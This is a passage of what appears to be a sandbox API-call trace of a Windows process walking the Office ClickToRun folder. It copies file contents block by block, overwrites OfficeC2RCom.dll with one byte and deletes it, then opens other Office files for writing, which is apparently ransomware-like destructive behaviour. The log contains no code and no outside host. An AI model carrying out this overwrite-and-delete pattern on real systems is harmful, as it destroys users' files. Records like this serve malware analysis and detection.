lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.281] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.281] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.295] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.306] WriteFile (in: hFile=0x418, lpBuffer=0x4f220*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0097.309] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0097.461] CloseHandle (hObject=0x418) returned 1 [0097.461] CloseHandle (hObject=0x360) returned 1 [0097.462] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0097.595] GetFileType (hFile=0x418) returned 0x1 [0097.595] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85440 | out: hHeap=0x20000) returned 1 [0097.596] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x4f220 [0097.596] GetLastError () returned 0xb7 [0097.596] SetLastError (dwErrCode=0xb7) [0097.596] WriteFile (in: hFile=0x418, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0097.597] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0097.597] CloseHandle (hObject=0x418) returned 1 [0097.597] AreFileApisANSI () returned 1 [0097.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0097.597] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x859e0 [0097.597] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x859e0, cchWideChar=75 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll") returned 75 [0097.597] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeC2RCom.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officec2rcom.dll")) returned 1 [0097.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x859e0 | out: hHeap=0x20000) returned 1 [0097.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0097.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0097.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0097.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0097.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0097.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0097.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d630 | out: hHeap=0x20000) returned 1 [0097.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d7b0 | out: hHeap=0x20000) returned 1 [0097.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x49ca0 | out: hHeap=0x20000) returned 1 [0097.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c170 | out: hHeap=0x20000) returned 1 [0097.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0097.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0097.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0097.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0097.599] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.599] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.599] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d07d85, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d07d85, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xbd0d7e00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x2a5e58, dwReserved0=0x1, dwReserved1=0x0, cFileName="OfficeClickToRun.exe", cAlternateFileName="OFFICE~2.EXE")) returned 1 [0097.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0097.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0097.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0097.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0097.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0097.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0097.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0097.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0097.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0097.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0097.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0097.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0097.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0097.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0097.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0097.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0097.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e3e8 [0097.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0097.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0097.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e3e8 | out: hHeap=0x20000) returned 1 [0097.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0097.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c998 [0097.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0097.600] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.600] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.600] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.600] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0097.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.600] AreFileApisANSI () returned 1 [0097.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 79 [0097.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0097.600] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.600] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0097.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0097.600] AreFileApisANSI () returned 1 [0097.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0097.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8c998 [0097.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8c998, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe") returned 79 [0097.600] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0097.600] GetFileType (hFile=0x418) returned 0x1 [0097.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c998 | out: hHeap=0x20000) returned 1 [0097.601] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0097.601] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0097.601] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0097.601] CloseHandle (hObject=0x418) returned 1 [0097.601] AreFileApisANSI () returned 1 [0097.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 79 [0097.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9e) returned 0x8d0d0 [0097.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8d0d0, cchWideChar=79 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe") returned 79 [0097.601] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeclicktorun.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.601] GetLastError () returned 0x20 [0097.602] GetLastError () returned 0x20 [0097.602] SetLastError (dwErrCode=0x20) [0097.602] GetLastError () returned 0x20 [0097.602] SetLastError (dwErrCode=0x20) [0097.602] GetLastError () returned 0x20 [0097.602] SetLastError (dwErrCode=0x20) [0097.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0097.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0097.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0097.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0097.602] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.602] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.602] FindNextFileW (in: hFindFile=0x78490, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d542e1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80d542e1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x3f141b52, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0x12ae, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="OfficeUpdateSchedule.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0097.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0097.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0097.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0097.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0097.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0097.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0097.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0097.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0097.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0097.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0097.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0097.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0097.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0097.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0097.602] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0097.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0097.602] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e4f8 [0097.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x55f20 [0097.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e4f8 | out: hHeap=0x20000) returned 1 [0097.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0097.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81130 [0097.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0097.603] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.603] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.603] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.603] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81130 | out: hHeap=0x20000) returned 1 [0097.603] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0097.603] AreFileApisANSI () returned 1 [0097.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml", lpUsedDefaultChar=0x0) returned 83 [0097.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0097.603] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.603] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0097.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0097.603] AreFileApisANSI () returned 1 [0097.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0097.603] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x603f8 [0097.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x603f8, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 83 [0097.603] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0097.604] GetFileType (hFile=0x418) returned 0x1 [0097.604] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x603f8 | out: hHeap=0x20000) returned 1 [0097.604] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0097.604] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0097.604] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0097.604] CloseHandle (hObject=0x418) returned 1 [0097.604] AreFileApisANSI () returned 1 [0097.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0097.604] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0097.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x715b8, cbMultiByte=-1, lpWideCharStr=0x60088, cchWideChar=83 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml") returned 83 [0097.605] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeUpdateSchedule.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\officeupdateschedule.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0097.605] GetFileType (hFile=0x418) returned 0x1 [0097.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0097.605] CloseHandle (hObject=0x418) returned 1 [0097.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0097.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0097.605] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0097.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0097.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0097.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0097.605] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0097.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0097.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0097.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0097.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0097.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0097.606] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0097.606] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0097.606] RtlAllocateHeap 